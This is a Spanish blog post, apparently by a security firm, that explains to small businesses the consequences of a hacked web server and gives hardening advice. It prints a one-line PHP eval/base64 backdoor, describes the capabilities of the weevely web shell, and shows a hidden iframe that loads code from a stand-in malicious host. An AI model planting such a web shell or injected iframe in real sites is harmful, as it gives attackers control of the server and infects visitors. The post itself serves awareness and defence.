¿y si nuestra web es hackeada?

En este post vamos a hacer una descripción lo más didáctica posible de algunas de las amenazas más frecuentes a las que se ven expuestos los servidores web, sus consecuencias para el negocio y algunas recomendaciones para evitarlas.

Creemos que el artículo es especialmente útil para emprendedores y responsables de pequeñas empresas, pues son los servidores de este tipo de negocios los que suelen ser más vulnerables a estos ataques, debido principalmente a las restricciones en recursos y medios y sobre todo al desconocimiento de los riesgos por parte de los responsables.

El primer paso para una gestión adecuada de riesgos de este tipo es comprender la naturaleza del problema. Esperamos cumplir este objetivo con este post.

 

Compromiso de servidores web: consecuencias para el negocio

En todos estos casos, el compromiso del servidor se lleva a cabo incluyendo (inyectando) código malicioso, normalmente en forma de scripts o páginas web fraudulentas que modifican el aspecto y/o el comportamiento de nuestro site a su antojo.

Cuando un servidor web es hackeado, esto suele tener una serie de posibles consecuencias negativas para el negocio. Las más comunes:

  • Nuestro servidor se convierte en un medio desde el cual los hackers infectan con virus u otro tipo de programas maliciosos a los visitantes de nuestro web. El objetivo que persiguen los hackers es infectar el mayor número de ordenadores o dispositivos móviles para crear una red  de zombies (o botnet). El uso de nuestro servidor web para este propósito  tiene un efecto negativo inmediato sobre la imagen de nuestro negocio, ya que muchos de nuestros visitantes serán advertidos por sus sistemas antivirus de que nuestro sitio web es una fuente de infección. En estos casos, además, tarde o temprano nuestro sitio será incluido en listas negras y nuestro canal web se verá inutilizado.

webatacante

Un aviso alertando a los usuarios de que el sitio al que pretenden ir es una amenaza de seguridad

  • Nuestra página web es manipulada de modo que nuestros visitantes son bombardeados con todo tipo de spam y publicidad indeseada. En los casos más severos, todo nuestro tráfico será redirigido a otros sitios creados especialmente para mostrar publicidad. El objetivo de este tipo de ataque es obtener beneficios en las redes de afiliación de márketing por el número de impresiones de publicidad a la que se expone al tráfico “robado” o aumentando el posicionamiento web de otros sites.  El resultado para nuestro negocio es obvio: pérdida de credibilidad y de oportunidades de negocio.
  • Nuestro servidor es usado como plataforma desde la que los hackers llevan a cabo actividades delictivas (ej: fraude online, almacenaje y distribución de contenidos ilegales….); de este modo, en caso de que las autoridades inicien una investigación, las pistas les llevarán hacia nosotros  y ellos quedarán impunes.
  • Nuestro servidor web puede ser  “secuestrado” y los hackers pedirán un rescate monetario a cambio de no destruir completamente nuestro canal web. Aquí el objetivo es el dinero fácil que habremos de pagar a menos que estemos dispuestos a perder totalmente nuestro servidor, sus bases de datos, etc… Recomendamos a los lectores leer el caso Code Spaces al que dedicamos un artículo en este medio hace unas semanas.

CODE_SPACES

Code Spaces, historia de cómo un ciberataque acabó literalmente con un negocio web

  • Nuestro servidor web es “desfigurado” de modo que la página principal es sustituida por otra que explica a los visitantes que nuestro sitio web ha sido hackeado debido a la pobre seguridad del mismo.

AnonMasked apache hacker

 

Defacement_01

Ejemplos de servidores desfigurados…

En todos estos casos, el compromiso del servidor se lleva a cabo incluyendo (inyectando) código malicioso, normalmente en forma de scripts o páginas web fraudulentas que modifican el aspecto o el comportamiento de nuestro site a su antojo.

Nuestro servidor web puede ser “secuestrado” y los hackers pedirán un rescate monetario a cambio de no destruir completamente nuestro canal web. Aquí el objetivo es el dinero fácil que habremos de pagar a menos que estemos dispuestos a perder totalmente nuestro servidor, sus bases de datos, etc…

¿Cómo consiguen los atacantes manipular nuestro servidor?

El modo más normal por el cual los atacantes  consiguen comprometer el servidor, es mediante la explotación de alguna vulnerabilidad técnica que les permite acceder y copiar/modificar archivos, sorteando los controles de acceso del servidor. Los servidores son más vulnerables en la medida en que están configurados con las opciones por defecto y no son parcheados regularmente, lo cual es, por cierto, algo bastante frecuente.

Hay algo que hay que tener claro: Si su servidor no se parchea de manera regular, es sólo cuestión de tiempo que será comprometido. Al igual que los leones atacan a las gacelas más débiles, así los atacantes harán presa de los servidores más vulnerables.

Otras formas por las cuales los atacantes consiguen acceder a nuestro servidor es robando las contraseñas mediante programas espía en el ordenador del administrador del sistema, o simplemente adivinando las contraseñas cuando estas son las que el sistema trae por defecto o cuando son muy poco seguras.

Si su servidor no se parchea de manera regular, es sólo cuestión de tiempo que será comprometido. Al igual que los leones atacan a las gacelas más débiles, así los atacantes harán presa de los servidores más vulnerables.

Puertas traseras

Una vez que han conseguido acceso al servidor, uno de los primeros objetivos que persiguen los atacantes es establecer (y ocultar) una puerta trasera (backdoor) que les permita acceder cuando lo necesiten y sin ser detectados.  Estas puertas traseras suelen ser scripts web de pequeño tamaño (¡!algunos pueden tener una sola línea de código!!) pero altamente efectivos y serán la cabeza de playa desde donde proseguir con el plan.

<?php $_REQUEST[e] ? eval( base64_decode( $_REQUEST[e] ) ) : exit; ?>

Ejemplo del código de una sencilla puerta trasera en PHP

Normalmente, las rutinas que establecen la puerta trasera están camuflados (ofuscados) para hacer difícil su detección

weevely_04

Ejemplo del código de una puerta trasera ofuscada

En la siguiente imagen puede verse el conjunto de acciones que permite realizar un conocido backdoor

weevely

weevely_02

weevely_03

Ejemplo de las opciones de weevely

Entre algunas de las funciones principales están:

  • Subida de ficheros al servidor y descarga de ficheros desde el servidor
  • Usar el servidor comprometido como proxy para navegar a Internet a través de él
  • Obtener los ficheros de contraseñas y tratar de crackearlas
  • Descargar las base de datos del servidor
  • Detección de los errores de configuración del servidor

Como puede verse, si los atacantes consiguen insertar en nuestro servidor una puerta trasera, esto quiere decir que están en el buen camino para obtener el control total del servidor.

Inyecciones de código (iFrames y redirectores)

Como hemos visto, el objetivo de los atacantes suele ser inyectar código en nuestro servidor para modificar el aspecto y/o el comportamiento del mismo. El método más frecuentemente usado es incluir en las páginas  un iframe invisible que contiene una referencia hacia una dirección externa, de modo que cuando un usuario de nuestra web navega por la página modificada se produce la ejecución de un código malicioso (ej: un javascript).

<iframe src=”http://www.sitiomuymuymalicioso.com/inject/?s=some-parameters” width=”1″ height=”1″ style=”visibility: hidden”></iframe>

Ejemplo de un iframe fraudulento

El objetivo puede ser:

  • Engañar al usuario para que acepte sin saberlo la descarga de un troyano que infectará su ordenador o dispositivo móvil.

Fake_AV

Ejemplo de una pantalla falsa que induce al usuario a pulsar aceptar para eliminar una falsa amenaza

  • Exponer al usuario a banners publicitarios que son incrustados en nuestra página web. Este tipo de ataques suelen usar técnicas más o menos sofisticadas para que estos enlaces fraudulentos solo sean visibles para los usuarios que llegan a nuestra página desde determinados buscadores y no para los administradores de la web.
  • En los casos más drásticos (por ejemplo, mediante la manipulación del archivo .htaccess del servidor), los visitantes de nuestro site serán redirigidos a un sitio controlado por los atacantes y poblado de publicidad indiscriminada.

Algunas recomendaciones básicas a tener en cuenta

Si consideramos que nuestro sitio web es un activo importante de nuestro negocio, a continuación se dan algunas recomendaciones a considerar:

  • En caso de que la administración esté subcontratada, acordar con el proveedor un nivel de servicio que nos permita tener control sobre la configuración de seguridad de nuestro servidor
  • Contar con el asesoramiento necesario para definir las medidas de seguridad necesarias y con un servicio de administración de nuestro servidor web que nos permita establecer y mantener estas medidas de seguridad. Contar con un servicio gestionado de seguridad puede ser un poco más caro, pero merece la pena.
  • Evitar usar servicios de hospedaje web en donde nuestra página esté alojada con las de otras empresas. Es preferible un servidor dedicado o un VPS.
  • Asegurarse de que no se emplean protocolos inseguros en la administración como FTP, en su lugar usar servicios como SSH.
  • Asegurarse de que se establezca autenticación fuerte (doble factor de autenticación) para acceder a las consolas de administración de nuestro servicio.
  • Asegurarse de que nuestro servidor está parcheado de manera regular y a tiempo cuando aparecen parches de seguridad que afecten al sistema operativo, bases de datos o plataforma web que usemos.
  • Usar el servidor únicamente para alojar la aplicación web y no usarlo para otros propósitos.
  • Asegurarse de que un firewall externo filtre el tráfico hacia nuestro servidor permitiendo solamente conexiones a los puertos y servicios necesarios.
  • Realizar periódicamente revisiones de seguridad para detectar y corregir posibles vulnerabilidades.
  • En caso, de que se tenga constancia o sospechas de que el servidor haya sido hackeado, contactar con asesores expertos para ayudar en la erradicación del problema.

Deja un comentario